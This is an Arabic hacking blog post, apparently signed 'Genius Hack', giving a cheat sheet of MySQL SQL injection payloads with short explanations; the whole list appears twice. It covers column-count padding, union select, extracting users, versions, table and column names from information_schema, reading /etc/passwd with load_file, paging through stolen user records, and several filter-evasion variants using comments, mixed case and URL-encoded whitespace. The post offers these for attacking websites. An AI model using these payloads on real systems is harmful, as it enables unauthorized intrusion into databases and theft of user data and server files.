اليوم حبيت أضع الأوامر التي تستخدم في الحقن
مع شرح
عدد الأعمدة لتسهيل الحقن
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,
24,25,26,27,28,29,30,31
,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,4 8,49
,50,51,52,53,54,55,56,57,58,59
,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,7 6,77
,78,79,80,81,82,83,84,85,86,87
,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,1 03,104
,105,106,107,108,109,110,111
,112,113,114,115,116,117,118,119,120,121,122,123,1 24,125
,126,127,128,129,130,131,132
,133,134,135,136,137,138,139,140,141,142,143,144,1 45
,146,147,148,149,150,151,152,153
,154,155,156,157,158,159,160,161,162,163,164,165
,166,167,168,169,170,171,172,173,174
,175,176,177,178,179,180,181,182,183,184,185,186
,187,188,189,190,191,192,193,194,195
,196,197,198,199,200,201,202,203,204,205,206,207
,208,209,210,211,212,213,214,215,216
,217,218,219,220,221,222,223,224,225,226,227,228
,229,230,231,232,233,234,235,236,237
,238,239,240,241,242,243,244,245,246,247,248,249,2 50
,251,252,253,254,255,256,257,258
,259,260,261,262,263,264,265,266,267,268,269,270,2 71
,272,273,274,275,276,277,278,279
,280,281,282,283,284,285,286,287,288,289,290,291,2 92,
293,294,295,296,297,298,299,300
################################################## ############################
user() :لمعرفة مستخدم قاعدة البيانات يساعدك في التخمين على PhpMyAdmin
version() : معرفة الاصدار 4 أو 5
database() : اسم القاعدة
@@datadir :مكان تواجد قاعدة البيانات
load_file('/etc/passwd') : لقراءة ملف المستخدمين لسيرفر و هي تكون فعالة في 30% من الحالات حسب تقديري الخاص بشرط يكون magic quotes=OFF
concat(user(),0x3c62723e,@@version,0x3c62723e,data base())
أمر استخراج القاعدة و اليوزر و نسخة القاعدة
################################################## ##############################
+order+by+ : معرفة عدد الأعمدة
+union+select+ : دالة الربط لتطبيق الأوامر
############################################
أوامر استخراج الجداول
concat(table_name,0x3a3a,column_name,0x3a3a,table_ schema)
concat_ws(0x3a3a3a,table_name,column_name)
concat(column_name,0x3a,table_schema,0x2e,table_na me)
أوامر استخراج الجداول والأعمدة التي تبدأ لكلمة مثل user admin
وتكتب بين قوسي CHAR ويتم يشفيرها قبل ذلك
group_concat(column_name,0x3a,table_schema,0x2e,ta ble_name)+from+information_schema.columns+where+co lumn_name+like+char()
أمر التنقل بين المعلومات المستخرجة يعني لو أنت تحقن موقع فيه أكثر من ييزر هذا الأمر يسمح لك باستخراجهم واحدا واحدا
كهذه الطريقة limit+2,2+offset+ ... limit+1+offset+ limit+1+offset+ ....
limit+1+offset+
union+all+select+ دالة الربط لتطبيق الأوامر ويسمح لك بالتخطي بعض الفلترات
بعد طرق تخطي الفلترة
hex(unhex()
AES_ENCRYPT()
AES_ENCRYPT().
UnIOn+AlL+SeLEcT
/**/UNION/**/SELECT(/**/1,2,3,(concat_ws(0x3a,table_schema,table_name,colu mn_name) ,5,6,7,8,9,10,11,12,13/**/FROM/**/INFORMATION_SCHEMA.COLUMNS)/**/LIMIT/**/180,1
/**/UNION/**/SELECT/**/1,2,3,CONVERT(concat_ws(0x3a,table_schema,table_na me,column_name) USING latin1),5,6,7,8,9,10,11,12,13/**/FROM/**/INFORMATION_SCHEMA.COLUMNS/**/LIMIT/**/180,1/*
/ ** / UNION / ** / select / ** / 1,2,3, unhex (hex (CONCAT_WS (0x3A, table_schema, table_name, column_name))), 5,6,7,8,9,10,11 , 12,13 / ** / from / ** / INFORMATION_SCHEMA.COLUMNS / ** / LIMIT / ** / 180,1 / *
/*--*/ UNION/*--*/ select /*--*/ 1,2,3, unhex (hex (CONCAT_WS (0x3A, table_schema, table_name, column_name))), 5,6,7,8,9,10,11 , 12,13 /*--*/ from /*--*/ INFORMATION_SCHEMA.COLUMNS/*--*/LIMIT /*--*/ 180,1 / *
+ UNION+ select + 1,2,3, unhex (hex (CONCAT_WS (0x3A, table_schema, table_name, column_name))), 5,6,7,8,9,10,11 , 12,13 /*--*/ from + INFORMATION_SCHEMA.COLUMNS+LIMIT + 180,1
%09 UNION%09 select %09 1,2,3, unhex (hex (CONCAT_WS (0x3A, table_schema, table_name, column_name))), 5,6,7,8,9,10,11 , 12,13 %09 from %09 INFORMATION_SCHEMA.COLUMNS%09 LIMIT %09 180,1
%0A UNION%09 select %0A 1,2,3, unhex (hex (CONCAT_WS (0x3A, table_schema, table_name, column_name))), 5,6,7,8,9,10,11 , 12,13 %0A from %0A INFORMATION_SCHEMA.COLUMNS %0A LIMIT %0A 180,1
################################################## ################################################## ####
مع شرح
عدد الأعمدة لتسهيل الحقن
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,
24,25,26,27,28,29,30,31
,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,4 8,49
,50,51,52,53,54,55,56,57,58,59
,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,7 6,77
,78,79,80,81,82,83,84,85,86,87
,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,1 03,104
,105,106,107,108,109,110,111
,112,113,114,115,116,117,118,119,120,121,122,123,1 24,125
,126,127,128,129,130,131,132
,133,134,135,136,137,138,139,140,141,142,143,144,1 45
,146,147,148,149,150,151,152,153
,154,155,156,157,158,159,160,161,162,163,164,165
,166,167,168,169,170,171,172,173,174
,175,176,177,178,179,180,181,182,183,184,185,186
,187,188,189,190,191,192,193,194,195
,196,197,198,199,200,201,202,203,204,205,206,207
,208,209,210,211,212,213,214,215,216
,217,218,219,220,221,222,223,224,225,226,227,228
,229,230,231,232,233,234,235,236,237
,238,239,240,241,242,243,244,245,246,247,248,249,2 50
,251,252,253,254,255,256,257,258
,259,260,261,262,263,264,265,266,267,268,269,270,2 71
,272,273,274,275,276,277,278,279
,280,281,282,283,284,285,286,287,288,289,290,291,2 92,
293,294,295,296,297,298,299,300
################################################## ############################
user() :لمعرفة مستخدم قاعدة البيانات يساعدك في التخمين على PhpMyAdmin
version() : معرفة الاصدار 4 أو 5
database() : اسم القاعدة
@@datadir :مكان تواجد قاعدة البيانات
load_file('/etc/passwd') : لقراءة ملف المستخدمين لسيرفر و هي تكون فعالة في 30% من الحالات حسب تقديري الخاص بشرط يكون magic quotes=OFF
concat(user(),0x3c62723e,@@version,0x3c62723e,data base())
أمر استخراج القاعدة و اليوزر و نسخة القاعدة
################################################## ##############################
+order+by+ : معرفة عدد الأعمدة
+union+select+ : دالة الربط لتطبيق الأوامر
############################################
أوامر استخراج الجداول
concat(table_name,0x3a3a,column_name,0x3a3a,table_ schema)
concat_ws(0x3a3a3a,table_name,column_name)
concat(column_name,0x3a,table_schema,0x2e,table_na me)
أوامر استخراج الجداول والأعمدة التي تبدأ لكلمة مثل user admin
وتكتب بين قوسي CHAR ويتم يشفيرها قبل ذلك
group_concat(column_name,0x3a,table_schema,0x2e,ta ble_name)+from+information_schema.columns+where+co lumn_name+like+char()
أمر التنقل بين المعلومات المستخرجة يعني لو أنت تحقن موقع فيه أكثر من ييزر هذا الأمر يسمح لك باستخراجهم واحدا واحدا
كهذه الطريقة limit+2,2+offset+ ... limit+1+offset+ limit+1+offset+ ....
limit+1+offset+
union+all+select+ دالة الربط لتطبيق الأوامر ويسمح لك بالتخطي بعض الفلترات
بعد طرق تخطي الفلترة
hex(unhex()
AES_ENCRYPT()
AES_ENCRYPT().
UnIOn+AlL+SeLEcT
/**/UNION/**/SELECT(/**/1,2,3,(concat_ws(0x3a,table_schema,table_name,colu mn_name) ,5,6,7,8,9,10,11,12,13/**/FROM/**/INFORMATION_SCHEMA.COLUMNS)/**/LIMIT/**/180,1
/**/UNION/**/SELECT/**/1,2,3,CONVERT(concat_ws(0x3a,table_schema,table_na me,column_name) USING latin1),5,6,7,8,9,10,11,12,13/**/FROM/**/INFORMATION_SCHEMA.COLUMNS/**/LIMIT/**/180,1/*
/ ** / UNION / ** / select / ** / 1,2,3, unhex (hex (CONCAT_WS (0x3A, table_schema, table_name, column_name))), 5,6,7,8,9,10,11 , 12,13 / ** / from / ** / INFORMATION_SCHEMA.COLUMNS / ** / LIMIT / ** / 180,1 / *
/*--*/ UNION/*--*/ select /*--*/ 1,2,3, unhex (hex (CONCAT_WS (0x3A, table_schema, table_name, column_name))), 5,6,7,8,9,10,11 , 12,13 /*--*/ from /*--*/ INFORMATION_SCHEMA.COLUMNS/*--*/LIMIT /*--*/ 180,1 / *
+ UNION+ select + 1,2,3, unhex (hex (CONCAT_WS (0x3A, table_schema, table_name, column_name))), 5,6,7,8,9,10,11 , 12,13 /*--*/ from + INFORMATION_SCHEMA.COLUMNS+LIMIT + 180,1
%09 UNION%09 select %09 1,2,3, unhex (hex (CONCAT_WS (0x3A, table_schema, table_name, column_name))), 5,6,7,8,9,10,11 , 12,13 %09 from %09 INFORMATION_SCHEMA.COLUMNS%09 LIMIT %09 180,1
%0A UNION%09 select %0A 1,2,3, unhex (hex (CONCAT_WS (0x3A, table_schema, table_name, column_name))), 5,6,7,8,9,10,11 , 12,13 %0A from %0A INFORMATION_SCHEMA.COLUMNS %0A LIMIT %0A 180,1
################################################## ################################################## ####
Genius Hack
ردودك تشجعنى على العمل للمزيد لخدمتك
0 التعليقات:
إرسال تعليق